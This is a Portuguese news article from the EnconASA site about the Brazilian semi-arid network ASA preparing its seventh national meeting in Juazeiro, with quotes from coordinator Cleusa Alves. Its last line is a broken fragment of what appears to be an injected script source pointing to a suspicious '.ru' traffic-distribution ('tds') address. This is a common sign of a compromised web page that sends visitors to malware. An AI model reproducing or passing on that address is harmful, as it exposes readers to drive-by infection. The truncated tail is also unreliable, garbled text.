Comunidades e organizações mobilizam-se para o Encontro Nacional da ASA
![](https://enconasa.asabrasil.org.br/wp-content/uploads/2025/02/semImagem.gif)
As organizações da ASA já estão se mobilizando para o EnconASA – Encontro Nacional da Articulação no Semi-Árido Brasileiro, que acontecerá em Juazeiro, Bahia, de 16 a 20 de novembro. Esta sétima edição do Encontro ganha também um toque de celebração, com as comemorações dos 10 anos da ASA. Um momento para festejar, mas também para analisar.
“Queremos avaliar o grau de transformação que a ASA proporcionou para a nossa região, a partir de sete grandes temas, como água, terra, segurança alimentar, por exemplo. De que forma, e até que ponto, conseguimos intervir nas políticas públicas nessas áreas? Essas são algumas reflexões que faremos nesse EnconASA”, explica Cleusa Alves, coordenadora executiva da ASA e integrante da equipe organizadora do Encontro.
Um marco na agenda política da Articulação, o EnconASA, que acontece a cada dois anos, não se resume apenas a um evento. É um momento de expressão coletiva do que agricultores, agricultoras e sociedade civil organizada pensam e propõem para a região.
“Ao longo desses 10 anos, a ASA apresentou alternativas ao modelo hegemônico de desenvolvimento estabelecido na região. Alternativas que se mostraram exitosas e que queremos consolidar. Precisamos analisar o caminho percorrido até aqui, inclusive as lacunas existentes, para decidirmos para onde caminharemos na consolidação de uma proposta popular e democrática de desenvolvimento sustentável para o Semiárido”, conclui.
Vários momentos preparatórios para o EnconASA acontecem desde o começo deste ano nas microrregiões, territórios e estados do Semiárido. Até lá, serão cerca de 112 eventos com a participação de 3 mil pessoas, nas esferas microrregional e territorial, configurando-se um amplo processo de construção coletiva e democrática.
Matérias relacionadas:
VII Encontro reunirá cerca de 500 pessoas em Juazeiro
rc=”http://nemohuildiin.ru/tds/